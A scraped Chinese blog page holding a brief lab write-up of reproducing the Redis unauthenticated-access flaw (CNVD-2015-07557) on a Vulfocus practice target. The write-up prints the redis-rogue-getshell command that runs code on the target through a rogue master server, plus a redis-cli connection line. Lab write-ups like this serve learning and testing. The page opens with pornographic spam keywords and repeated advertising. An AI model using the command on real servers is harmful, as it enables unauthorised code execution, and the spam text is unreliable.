欧美free性护士vide0shd,老熟女,一区二区三区,久久久久夜夜夜精品国产,久久久久久综合网天天,欧美成人护士h版

首頁綜合 正文
目錄

柚子快報邀請碼778899分享:redis cnvd

柚子快報邀請碼778899分享:redis cnvd

http://yzkb.51969.com/

1.復(fù)現(xiàn)環(huán)境與工具

環(huán)境是在vulfocus上面

工具:GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module

參考攻擊使用方式與原理:https://vulhub.org/#/environments/redis/4-unacc/

2.復(fù)現(xiàn)

需要一個外網(wǎng)的服務(wù)器做,上傳這個工具到服務(wù)器上進入這個文件夾里面后輸入命令: python3 redis-master.py -r 目的ip -p 目的端口 -L 你的ip -P 你開放的端口?-f RedisModulesSDK/exp.so -c "id"

出了一個file,搜了一下是由于這個文件用python3寫的,要檢查一下你的服務(wù)器上是不是python版本3.0以上,用where python查python的安裝位置 ls -l 目錄/py* 得到代python的所有文件,看有沒有python3 ,他的命令是什么 參考:Linux系統(tǒng)安裝Python3環(huán)境(超詳細(xì))-騰訊云開發(fā)者社區(qū)-騰訊云

我這里是裝了的,名稱為python3

這個要先根據(jù)他github上面的內(nèi)容去做make之后再運行 python3 redis-master.py -r 目的ip -p 目的端口 -L 攻擊者ip -P 對應(yīng)端口 -f RedisModulesSDK/exp.so -c "id"redis-cli -h 123.58.224.8 -p 45635 用redis組件去連接上這個redis,之后按照我的理解來說應(yīng)該是用redis寫入公鑰連接才對:

參考redis未授權(quán)訪問-cnvd 2015-0755漏洞復(fù)現(xiàn) - FreeBuf網(wǎng)絡(luò)安全行業(yè)門戶

但是去試的時候發(fā)現(xiàn)

好像是環(huán)境有點問題,沒權(quán)限了 所以需要用寫入web的方法去做,要換工具做 要是還是想得到flag的話就參考

未授權(quán)漏洞vulfocu靶場實戰(zhàn)_vulfocus中redis未授權(quán)漏洞如何拿到falg-CSDN博客

vulfocus靶場redis 未授權(quán)訪問漏洞之CNVD-2015-07557-CSDN博客

我太懶了,實在不想重新來過了

柚子快報邀請碼778899分享:redis cnvd

http://yzkb.51969.com/

文章來源

評論可見,查看隱藏內(nèi)容

本文內(nèi)容根據(jù)網(wǎng)絡(luò)資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點和立場。

轉(zhuǎn)載請注明,如有侵權(quán),聯(lián)系刪除。

本文鏈接:http://gantiao.com.cn/post/19538933.html

發(fā)布評論

您暫未設(shè)置收款碼

請在主題配置——文章設(shè)置里上傳

掃描二維碼手機訪問

文章目錄